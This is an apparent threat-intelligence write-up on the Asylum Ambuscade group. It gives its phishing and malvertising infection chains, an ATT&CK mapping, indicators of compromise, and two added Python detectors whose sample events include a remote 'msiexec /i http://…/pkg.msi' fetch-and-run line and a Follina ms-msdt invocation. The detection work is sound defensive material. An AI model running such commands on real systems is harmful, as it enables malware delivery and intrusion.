The threat actor known as Asylum Ambuscade has been observed straddling cybercrime and cyber espionage operations since at least early 2020. A recent ESET analysis describes Asylum Ambuscade as a crimeware group that targets bank customers and cryptocurrency traders in several regions, including North America and Europe, while also conducting espionage against government entities in Europe and Central Asia.


Asylum Ambuscade first came to light in March 2022, when Proofpoint documented a phishing campaign, assessed at the time as nation-state-sponsored, that targeted European governmental entities to obtain intelligence on refugee and supply movement. The campaign's primary objective was to steal confidential information and webmail credentials from official government email portals.


Asylum Ambuscade's attacks typically start with a spear-phishing email carrying a malicious Excel spreadsheet (occasionally a Word document). Once opened, the attachment either runs embedded VBA code or exploits the Follina vulnerability (CVE-2022-30190) in the Microsoft Support Diagnostic Tool to download an MSI package from a remote server.

The MSI installer deploys SunSeed, a downloader written in Lua that persists through a LNK file in the Startup folder and retrieves an AutoHotkey-based implant known as AHK Bot (AHKBOT in ESET's reporting) from another remote server. This multi-stage approach helps the attackers maintain persistence and evade detection.
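The delivery chain above leaves a recognisable shape in process-creation telemetry: an Office application whose descendant is msdt.exe carrying an ms-msdt: URI (Follina) or msiexec.exe pulling a package from a URL. The following detector is an added example, not code from ESET or Proofpoint; it walks up to two parents so the chain is caught whether the MSI is launched directly from Office or through an intermediate shell. The events, hostnames, PIDs, paths and the 198.51.100.7 URL are constructed for illustration.

```python
"""Flag the Office-to-MSI delivery chain in process-creation telemetry.

Added example, not code from ESET or Proofpoint. It looks for an Office
application that, directly or through one intermediate shell, launches
msdt.exe with an ms-msdt: URI (Follina, CVE-2022-30190) or msiexec.exe
with a remote package URL. Events are a constructed Sysmon-like subset;
hostnames, PIDs, paths and the URL are invented for illustration.
"""
from __future__ import annotations
from dataclasses import dataclass
from typing import Iterable

OFFICE_IMAGES = {"excel.exe", "winword.exe", "powerpnt.exe"}
# Children worth a look when an Office process is an ancestor.
SUSPICIOUS_CHILDREN = {"msdt.exe", "msiexec.exe", "cmd.exe", "powershell.exe", "wscript.exe"}
MAX_DEPTH = 2  # Office -> child, or Office -> shell -> child


@dataclass(frozen=True)
class ProcEvent:
    host: str
    pid: int
    ppid: int
    image: str
    cmdline: str


def _base(image: str) -> str:
    """Lower-cased file name of an image path."""
    return image.replace("\\", "/").rsplit("/", 1)[-1].lower()


def detect_office_chain(events: Iterable[ProcEvent]) -> list[dict]:
    """Return one finding per suspicious child whose ancestry (within
    MAX_DEPTH) contains an Office application."""
    by_key = {(e.host, e.pid): e for e in events}
    findings = []
    for ev in by_key.values():
        child = _base(ev.image)
        if child not in SUSPICIOUS_CHILDREN:
            continue
        ancestor = by_key.get((ev.host, ev.ppid))
        depth = 1
        while ancestor is not None and depth <= MAX_DEPTH:
            office = _base(ancestor.image)
            if office in OFFICE_IMAGES:
                reasons = [f"{office} -> {child} (depth {depth})"]
                cl = ev.cmdline.lower()
                if child == "msdt.exe" and "ms-msdt:" in cl:
                    reasons.append("ms-msdt: URI on command line (Follina, CVE-2022-30190)")
                if child == "msiexec.exe" and ("http://" in cl or "https://" in cl):
                    reasons.append("msiexec installing a package from a remote URL")
                findings.append({"host": ev.host, "pid": ev.pid, "image": child, "reasons": reasons})
                break
            ancestor = by_key.get((ancestor.host, ancestor.ppid))
            depth += 1
    return findings


# Constructed events. 198.51.100.7 is a documentation address, not a real IoC.
SAMPLE_EVENTS = [
    ProcEvent("ws01", 100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent("ws01", 200, 100, r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
              '"EXCEL.EXE" C:\\Users\\bob\\Downloads\\invoice.xls'),
    ProcEvent("ws01", 300, 200, r"C:\Windows\System32\msiexec.exe",
              "msiexec.exe /i http://198.51.100.7/pkg.msi /qn"),
    ProcEvent("ws01", 301, 200, r"C:\Windows\System32\msdt.exe",
              "msdt.exe ms-msdt:/id PCWDiagnostic /skip force"),
    # Depth 2: Word -> cmd -> msiexec
    ProcEvent("ws03", 500, 1, r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
              '"WINWORD.EXE" C:\\Users\\eve\\Downloads\\memo.docx'),
    ProcEvent("ws03", 510, 500, r"C:\Windows\System32\cmd.exe",
              "cmd.exe /c msiexec /i http://198.51.100.7/pkg.msi /qn"),
    ProcEvent("ws03", 520, 510, r"C:\Windows\System32\msiexec.exe",
              "msiexec /i http://198.51.100.7/pkg.msi /qn"),
    # Benign: software deployment from Explorer with a local package
    ProcEvent("ws02", 400, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent("ws02", 410, 400, r"C:\Windows\System32\msiexec.exe",
              r"msiexec.exe /i C:\installers\7zip.msi /qn"),
]

if __name__ == "__main__":
    for finding in detect_office_chain(SAMPLE_EVENTS):
        print(finding)
```

The benign ws02 case shows why parent lineage, not msiexec alone, is the signal: msiexec runs constantly in managed fleets, but Office as an ancestor is rare enough to page on.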


Notably, Asylum Ambuscade has also been engaged in cybercrime, claiming more than 4,500 victims worldwide since January 2022, spread across North America, Asia, Africa, Europe, and South America. The group targets individuals, cryptocurrency traders, and small and medium-sized businesses (SMBs) in various sectors.

ESET researcher Matthieu Faou believes that while one aspect of the attacks is focused on stealing cryptocurrency, the targeting of SMBs is likely aimed at monetizing the access by selling it to other cybercriminal groups.

The cybercrime compromise chain follows a similar pattern: the initial intrusion vector is a malicious Google Ad or a traffic direction system (TDS) that redirects potential victims to a site delivering a malicious JavaScript file. Asylum Ambuscade has also used a Node.js port of AHK Bot called NODEBOT, which downloads plugins that capture screenshots, harvest passwords, gather system information, and install additional trojans and stealers.

The similarities observed in the attack chains employed by Asylum Ambuscade in both cybercrime and espionage activities suggest that the group is primarily a cybercrime organization with some involvement in cyber espionage.

ESET also notes overlap with an additional activity cluster known as Screentime, which Proofpoint tracks as TA866 and which targets companies in the U.S. and Germany with tailored malware to steal sensitive information. These overlaps further underline the group's diverse operations.

“It is quite unusual to catch a cybercrime group running dedicated cyberespionage operations,” Faou said. Asylum Ambuscade’s dual-threat activities make it a notable rarity in the ever-evolving threat landscape.


MITRE ATT&CK techniques

Each entry lists the tactic, the technique ID and name, and how Asylum Ambuscade uses it.

Resource Development
  T1583.003  Acquire Infrastructure: Virtual Private Server
             Asylum Ambuscade rented VPS servers.
  T1587.001  Develop Capabilities: Malware
             Asylum Ambuscade develops custom implants in various scripting languages.

Initial Access
  T1189      Drive-by Compromise
             Targets were redirected via a TDS to a website delivering a malicious JavaScript file.
  T1566.001  Phishing: Spearphishing Attachment
             Targets receive malicious Excel or Word documents.

Execution
  T1059.005  Command and Scripting Interpreter: Visual Basic
             Asylum Ambuscade has a downloader in VBS.
  T1059.006  Command and Scripting Interpreter: Python
             Asylum Ambuscade has a screenshotter in Python.
  T1059.007  Command and Scripting Interpreter: JavaScript
             Asylum Ambuscade has a downloader in JavaScript (NODEBOT).
  T1059      Command and Scripting Interpreter
             Asylum Ambuscade has downloaders in other scripting languages such as Lua, AutoHotkey, or Tcl.
  T1204.002  User Execution: Malicious File
             Targets need to manually execute the malicious document or JavaScript file.

Persistence
  T1547.001  Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
             SunSeed persists via a LNK file in the Startup folder.

Defense Evasion
  T1027.010  Obfuscated Files or Information: Command Obfuscation
             Downloaded JavaScript files are obfuscated with junk code.

Credential Access
  T1555.003  Credentials from Password Stores: Credentials from Web Browsers
             The AHKBOT passwords plugin can steal browser credentials.

Discovery
  T1087.002  Account Discovery: Domain Account
             The AHKBOT domain plugin gathers information about the domain using net group.
  T1010      Application Window Discovery
             The AHKBOT wndlist plugin lists the active windows.
  T1482      Domain Trust Discovery
             The AHKBOT domain plugin gathers information using nltest.
  T1057      Process Discovery
             The AHKBOT tasklist plugin lists the active processes using the WMI query Select * from Win32_Process.
  T1518.001  Software Discovery: Security Software Discovery
             The AHKBOT hardware plugin lists security software using the WMI queries Select * from FirewallProduct, Select * from AntiSpywareProduct and Select * from AntiVirusProduct.
  T1082      System Information Discovery
             The AHKBOT wndlist plugin gets system information using systeminfo.
  T1016      System Network Configuration Discovery
             The AHKBOT wndlist plugin gets network configuration information using ipconfig /all.

Collection
  T1056.001  Input Capture: Keylogging
             The AHKBOT keylogon plugin records keystrokes.
  T1115      Clipboard Data
             The AHKBOT keylogon plugin monitors the clipboard.
  T1113      Screen Capture
             The AHKBOT deskscreen plugin takes screenshots.

Command and Control
  T1071.001  Application Layer Protocol: Web Protocols
             AHKBOT (and all the other downloaders) communicates with the C&C server via HTTP.

Exfiltration
  T1041      Exfiltration Over C2 Channel
             Data is exfiltrated via the C&C channel.
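The Discovery rows above name concrete commands and WMI queries the AHKBOT plugins issue (net group, nltest, systeminfo, ipconfig /all, Select * from Win32_Process and the SecurityCenter product classes). Individually each is routine admin activity; what stands out is several of them fired from one host within minutes. The scorer below is an added example, not ESET's code: it maps each command line or WMI query string to the technique ID from the table and alerts when a sliding window on one host covers enough distinct techniques. Timestamps, hostnames and the AutoHotkey.exe image name are constructed (the page only says "AutoHotkey-based"), and the threshold of three techniques in ten minutes is an assumption to tune per environment.

```python
"""Score bursts of discovery activity matching the AHKBOT plugins listed in
the ATT&CK table above.

Added example, not ESET's code. Input records are constructed: each is
(timestamp, host, image, text) where text is a process command line or a
WMI query string as captured by WMI activity tracing. The alert threshold
(three distinct techniques inside ten minutes) is an assumption.
"""
from __future__ import annotations
from collections import defaultdict
from datetime import datetime, timedelta
import re

# Technique id, label, pattern over the lower-cased text. Taken from the
# commands and queries the table attributes to the AHKBOT discovery plugins.
DISCOVERY_SIGNATURES = [
    ("T1087.002", "net group", re.compile(r"\bnet1?(?:\.exe)?\s+group\b")),
    ("T1482", "nltest", re.compile(r"\bnltest(?:\.exe)?\b")),
    ("T1057", "WMI Win32_Process", re.compile(r"select\s+\*\s+from\s+win32_process\b")),
    ("T1518.001", "WMI security products",
     re.compile(r"select\s+\*\s+from\s+(?:antivirusproduct|antispywareproduct|firewallproduct)\b")),
    ("T1082", "systeminfo", re.compile(r"\bsysteminfo(?:\.exe)?\b")),
    ("T1016", "ipconfig /all", re.compile(r"\bipconfig(?:\.exe)?\s+/all\b")),
]


def classify(text: str) -> str | None:
    """Map one command line or WMI query to an ATT&CK technique id, or None."""
    low = text.lower()
    for tid, _label, pattern in DISCOVERY_SIGNATURES:
        if pattern.search(low):
            return tid
    return None


def discovery_bursts(events, window=timedelta(minutes=10), min_distinct=3):
    """Return one alert per host whose discovery hits inside any sliding
    window cover at least min_distinct different techniques."""
    per_host: dict[str, list[tuple[datetime, str, str]]] = defaultdict(list)
    for ts, host, image, text in events:
        tid = classify(text)
        if tid:
            per_host[host].append((ts, tid, image))
    alerts = []
    for host, hits in sorted(per_host.items()):
        hits.sort()
        for i, (start, _, _) in enumerate(hits):
            in_window = [h for h in hits[i:] if h[0] - start <= window]
            techniques = {tid for _, tid, _ in in_window}
            if len(techniques) >= min_distinct:
                alerts.append({
                    "host": host,
                    "start": start,
                    "techniques": sorted(techniques),
                    "images": sorted({img for _, _, img in in_window}),
                })
                break  # one alert per host is enough for triage
    return alerts


def _t(hhmm: str) -> datetime:
    return datetime.fromisoformat(f"2023-06-08T{hhmm}:00")


# Constructed telemetry. ws01 shows an AHKBOT-style burst (the interpreter
# image name is an assumption); ws02 is an admin running the same
# commands hours apart and must not alert.
SAMPLE_EVENTS = [
    (_t("10:00"), "ws01", "AutoHotkey.exe", 'net group "Domain Admins" /domain'),
    (_t("10:01"), "ws01", "AutoHotkey.exe", "nltest /domain_trusts /all_trusts"),
    (_t("10:02"), "ws01", "AutoHotkey.exe", "systeminfo"),
    (_t("10:02"), "ws01", "AutoHotkey.exe", "ipconfig /all"),
    (_t("10:03"), "ws01", "AutoHotkey.exe", "Select * from AntiVirusProduct"),
    (_t("10:03"), "ws01", "AutoHotkey.exe", "Select * from Win32_Process"),
    (_t("09:00"), "ws02", "cmd.exe", "systeminfo"),
    (_t("15:30"), "ws02", "cmd.exe", "ipconfig /all"),
    (_t("15:31"), "ws02", "cmd.exe", "ping 10.0.0.1"),  # not discovery
]

if __name__ == "__main__":
    for alert in discovery_bursts(SAMPLE_EVENTS):
        print(alert)
```

Counting distinct techniques rather than raw hits is deliberate: a login script that runs ipconfig /all ten times is one technique, while the AHKBOT domain, wndlist, tasklist and hardware plugins together light up six.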

Indicators of Compromise

IP addresses are defanged with [.] below; replace it with a dot before matching against logs. Several addresses are rented hosting, and at least one (172.64.80[.]1) falls in a Cloudflare range, so treat an IP hit as lower confidence than a hash hit.

SHA-1 file hashes
2B42FD41A1C8AC12221857DD2DF93164A71B95D7
D5F8ACAD643EE8E1D33D184DAEA0C8EA8E7FD6F8
57157C5D3C1BB3EB3E86B24B1F4240C867A5E94F
7DB446B95D5198330B2B25E4BA6429C57942CFC9
5F67279C195F5E8A35A24CBEA76E25BAD6AB6E8E
C98061592DE61E34DA280AB179465580947890DE
519E388182DE055902C656B2D95CCF265A96CEAB
AC3AFD14AD1AEA9E77A84C84022B4022DF1FC88B
64F5AC9F0C6C12F2A48A1CB941847B0662734FBF
557C5150A44F607EC4E7F4D0C0ED8EE6E9D12ADF
F85B82805C6204F34DB0858E2F04DA9F620A0277
5492061DE582E71B2A5DA046536D4150F6F497F1
C554100C15ED3617EBFAAB00C983CED5FEC5DB11
AD8143DE4FC609608D8925478FD8EA3CD9A37C5D
F2948C27F044FC6FB4849332657801F78C0F7D5E
7AA23E871E796F89C465537E6ECE962412CDA636
384961E19624437EB4EB22B1BF45953D7147FB8F
7FDB9A73B3F13DBD94D392132D896A5328DACA59
3E38D54CC55A48A3377A7E6A0800B09F2E281978
7F8742778FC848A6FBCFFEC9011B477402544171
29604997030752919EA42B6D6CEE8D3AE28F527E
7A78AF75841C2A8D8A5929C214F08EB92739E9CB
441369397D0F8DB755282739A05CB4CF52113C40
117ECFA95BE19D5CF135A27AED786C98EC8CE50B
D24A9C8A57C08D668F7D4A5B96FB7B5BA89D74C3
95EDC096000C5B8DA7C8F93867F736928EA32575
62FA77DAEF21772D599F2DC17DBBA0906B51F2D9
A9E3ACFE029E3A80372C0BB6B7C500531D09EDBE
EE1CFEDD75CBA9028904C759740725E855AA46B5
IP addresses
5.39.222[.]150
5.44.42[.]27
5.230.68[.]137
5.230.71[.]166
5.230.72[.]38
5.230.72[.]148
5.230.73[.]57
5.230.73[.]63
5.230.73[.]241
5.230.73[.]247
5.230.73[.]248
5.230.73[.]250
5.252.118[.]132
5.252.118[.]204
5.255.88[.]222
23.106.123[.]119
31.192.105[.]28
45.76.211[.]131
45.77.185[.]151
45.132.1[.]238
45.147.229[.]20
46.17.98[.]190
46.151.24[.]197
46.151.24[.]226
46.151.25[.]15
46.151.25[.]49
46.151.28[.]18
51.83.182[.]153
51.83.189[.]185
62.84.99[.]195
62.204.41[.]171
77.83.197[.]138
79.137.196[.]121
79.137.197[.]187
80.66.88[.]155
84.32.188[.]29
84.32.188[.]96
85.192.49[.]106
85.192.63[.]13
85.192.63[.]126
85.239.60[.]40
88.210.10[.]62
89.41.182[.]94
89.107.10[.]7
89.208.105[.]255
91.245.253[.]112
94.103.83[.]46
94.140.114[.]133
94.140.114[.]230
94.140.115[.]44
94.232.41[.]96
94.232.41[.]108
94.232.43[.]214
98.142.251[.]26
98.142.251[.]226
104.234.118[.]163
104.248.149[.]122
109.107.173[.]72
116.203.252[.]67
128.199.82[.]141
139.162.116[.]148
141.105.64[.]121
146.0.77[.]15
146.70.79[.]117
157.254.194[.]225
157.254.194[.]238
172.64.80[.]1
172.86.75[.]49
172.104.94[.]104
172.105.235[.]94
172.105.253[.]139
176.124.214[.]229
176.124.217[.]20
185.70.184[.]44
185.82.126[.]133
185.123.53[.]49
185.150.117[.]122
185.163.45[.]221
193.109.69[.]52
193.142.59[.]152
193.142.59[.]169
194.180.174[.]51
195.2.81[.]70
195.133.196[.]230
212.113.106[.]27
212.113.116[.]147
212.118.43[.]231
213.109.192[.]230